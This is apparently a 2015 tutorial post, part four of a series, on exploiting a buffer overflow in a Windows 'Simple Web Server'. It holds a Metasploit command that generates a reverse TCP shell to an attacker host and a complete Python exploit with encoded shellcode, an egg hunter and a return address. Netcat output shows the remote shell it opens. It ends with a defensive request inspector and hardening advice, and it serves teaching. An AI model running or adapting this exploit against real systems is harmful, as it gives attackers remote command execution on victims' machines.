22 June 2015


Article 4: Injecting our Malicious Payload

So, the story so far. We know we have an application vulnerable to a buffer overflow. We have seen that we can overwrite EIP and so force a command of our choosing to be run. We have identified which characters can safely be used in the malicious code we will build in this article. We have also set up a mechanism for finding that code in memory by means of an egg hunter. Finally, let’s generate the malicious code, insert it and run it.

Shellcode Generation

Finally, we need to generate our malicious payload and add it to our exploit. We use the Metasploit framework to generate a reverse TCP shell, excluding the characters we identified as problematic. A reverse shell is preferred because it will succeed unless strict egress filtering is in place.

msfpayload windows/shell_reverse_tcp LHOST=192.168.1.30 LPORT=443 R | msfencode -e x86/shikata_ga_nai -b '\x00\x01\x02\x09\x0a' -t python
[*] x86/shikata_ga_nai succeeded with size 351 (iteration=1)

msfencode then prints the encoded payload as a Python string (buf = "" followed by buf += lines); those 351 bytes are pasted unchanged as buf in the completed exploit code below.


The Completed Exploit Code


#!/bin/python
import socket

host = "192.168.1.20"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 80))

# size: 351 reverse tcp shell
buf = ""
buf += "\xd9\xd0\xb8\xd9\x95\x2c\xe8\xd9\x74\x24\xf4\x5b\x31"
buf += "\xc9\xb1\x52\x31\x43\x17\x83\xc3\x04\x03\x9a\x86\xce"
buf += "\x1d\xe0\x41\x8c\xde\x18\x92\xf1\x57\xfd\xa3\x31\x03"
buf += "\x76\x93\x81\x47\xda\x18\x69\x05\xce\xab\x1f\x82\xe1"
buf += "\x1c\x95\xf4\xcc\x9d\x86\xc5\x4f\x1e\xd5\x19\xaf\x1f"
buf += "\x16\x6c\xae\x58\x4b\x9d\xe2\x31\x07\x30\x12\x35\x5d"
buf += "\x89\x99\x05\x73\x89\x7e\xdd\x72\xb8\xd1\x55\x2d\x1a"
buf += "\xd0\xba\x45\x13\xca\xdf\x60\xed\x61\x2b\x1e\xec\xa3"
buf += "\x65\xdf\x43\x8a\x49\x12\x9d\xcb\x6e\xcd\xe8\x25\x8d"
buf += "\x70\xeb\xf2\xef\xae\x7e\xe0\x48\x24\xd8\xcc\x69\xe9"
buf += "\xbf\x87\x66\x46\xcb\xcf\x6a\x59\x18\x64\x96\xd2\x9f"
buf += "\xaa\x1e\xa0\xbb\x6e\x7a\x72\xa5\x37\x26\xd5\xda\x27"
buf += "\x89\x8a\x7e\x2c\x24\xde\xf2\x6f\x21\x13\x3f\x8f\xb1"
buf += "\x3b\x48\xfc\x83\xe4\xe2\x6a\xa8\x6d\x2d\x6d\xcf\x47"
buf += "\x89\xe1\x2e\x68\xea\x28\xf5\x3c\xba\x42\xdc\x3c\x51"
buf += "\x92\xe1\xe8\xf6\xc2\x4d\x43\xb7\xb2\x2d\x33\x5f\xd8"
buf += "\xa1\x6c\x7f\xe3\x6b\x05\xea\x1e\xfc\xea\x43\x21\xe2"
buf += "\x82\x91\x21\x1b\xe8\x1f\xc7\x71\x1e\x76\x50\xee\x87"
buf += "\xd3\x2a\x8f\x48\xce\x57\x8f\xc3\xfd\xa8\x5e\x24\x8b"
buf += "\xba\x37\xc4\xc6\xe0\x9e\xdb\xfc\x8c\x7d\x49\x9b\x4c"
buf += "\x0b\x72\x34\x1b\x5c\x44\x4d\xc9\x70\xff\xe7\xef\x88"
buf += "\x99\xc0\xab\x56\x5a\xce\x32\x1a\xe6\xf4\x24\xe2\xe7"
buf += "\xb0\x10\xba\xb1\x6e\xce\x7c\x68\xc1\xb8\xd6\xc7\x8b"
buf += "\x2c\xae\x2b\x0c\x2a\xaf\x61\xfa\xd2\x1e\xdc\xbb\xed"
buf += "\xaf\x88\x4b\x96\xcd\x28\xb3\x4d\x56\x58\xfe\xcf\xff"
buf += "\xf1\xa7\x9a\xbd\x9f\x57\x71\x81\x99\xdb\x73\x7a\x5e"
buf += "\xc3\xf6\x7f\x1a\x43\xeb\x0d\x33\x26\x0b\xa1\x34\x63"

egghunter = (
    "\x33\xD2\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb"
    "\x53\x53\x53\x53\xb3\xc0\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0"
    "\x74\x19\x6a\x02\x58\xcd\x2e\x5a\x3c\x05\x74\xea\xb8"
    "\x77\x30\x30\x74"  # our egg = w00t
    "\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9"
    "\x89\xe2\x64\xff\x13\x5e\x5a\xeb\xdf\x90\x90"
)

payload = "GET /" + " HTTP/1.1\r\n"
payload += "Host: " + host + "\r\n"
# CALL ESP - libstdc++-6.dll 6fc66d71
payload += "Connection: " + "\x90" * 1689 + "w00tw00t" + buf + "\x71\x6d\xC6\x6F" + "\x90" * 8 + egghunter + "\r\n\r\n"
s.send(payload)
s.close()

If we run the code against the vulnerable server, the host connects back to the attacker’s machine and provides us with a remote shell. On the attacker’s side, a netcat listener on port 443 receives the connection:

nc -vv -l -p 443
listening on [any] 443 ...
192.168.1.20: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.1.20] from (UNKNOWN) [192.168.1.20] 50332
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\PMSoftware\sws>
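From the defender’s side, the request that delivered this shell does not look like HTTP at all: a Connection header well over a kilobyte long, made of a NOP sled, the doubled egg tag, shellcode and a return address. The following request inspector is an added example, not code from the article; the two sample requests are constructed, the 1024-byte header limit and the 32-byte sled threshold are assumed policy values, and the shellcode in the suspect sample is a short stand-in for the real 351-byte payload.

```python
import re

# Constructed sample requests (not captured traffic): a normal request and one
# shaped like the exploit above, i.e. a Connection header that carries a NOP
# sled, the doubled egg tag, shellcode and a return address instead of text.
BENIGN = b"GET / HTTP/1.1\r\nHost: 192.168.1.20\r\nConnection: keep-alive\r\n\r\n"
SUSPECT = (b"GET / HTTP/1.1\r\nHost: 192.168.1.20\r\n"
           b"Connection: " + b"\x90" * 1689 + b"w00tw00t"
           + b"\xd9\xd0\xb8" * 50          # stand-in for the 351-byte payload
           + b"\x71\x6d\xc6\x6f" + b"\x90" * 8 + b"\r\n\r\n")

MAX_HEADER_VALUE = 1024   # assumed site policy: no legitimate value is this long
SLED_MIN = 32             # this many consecutive 0x90 bytes is a sled, not text
EGG_TAG = b"w00tw00t"     # the egg hunter's tag, doubled, as in the exploit


def parse_headers(request):
    """Split a raw HTTP request into (name, value) byte pairs, lower-casing names."""
    head = request.partition(b"\r\n\r\n")[0]
    headers = []
    for line in head.split(b"\r\n")[1:]:      # skip the request line
        name, _, value = line.partition(b":")
        headers.append((name.strip().lower(), value.strip()))
    return headers


def inspect_request(request):
    """Return a list of findings for one request; an empty list means nothing suspicious."""
    findings = []
    for name, value in parse_headers(request):
        label = name.decode("ascii", "replace")
        if len(value) > MAX_HEADER_VALUE:
            findings.append("oversized header %s (%d bytes)" % (label, len(value)))
        if re.search(rb"\x90{%d,}" % SLED_MIN, value):
            findings.append("NOP sled in header %s" % label)
        if EGG_TAG in value:
            findings.append("egg-hunter tag in header %s" % label)
        if any(b < 0x20 or b > 0x7e for b in value):
            findings.append("non-printable bytes in header %s" % label)
    return findings
```

The egg-tag check is specific to this exploit and is the least durable of the four; the length and non-printable checks are the ones that generalise to any overflow delivered through a header.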


Why Didn’t the Protection Mechanisms Prevent This?

Since the compiler-based protections were not enabled on the web server’s binary, they could not take effect. That leaves DEP and ASLR. ASLR was trivial to bypass because we simply located a library that was not compiled with ASLR support. In Windows 7, DEP is enabled for core system services, but for other applications only on an opt-in basis, so again it did not take effect. In future articles we will look at these mechanisms in more detail.

Conclusion

This exercise shows how attacks of this nature can be avoided. Remove all unnecessary services, such as the “Simple Web Server” used in this exploit. Implement good egress rules on your firewall; they won’t stop every exploit, but they make life harder. Enable DEP wherever you can and be aware of the opt-in choices you need to make. Understanding how an exploit is carried out enables you to defend better against it.
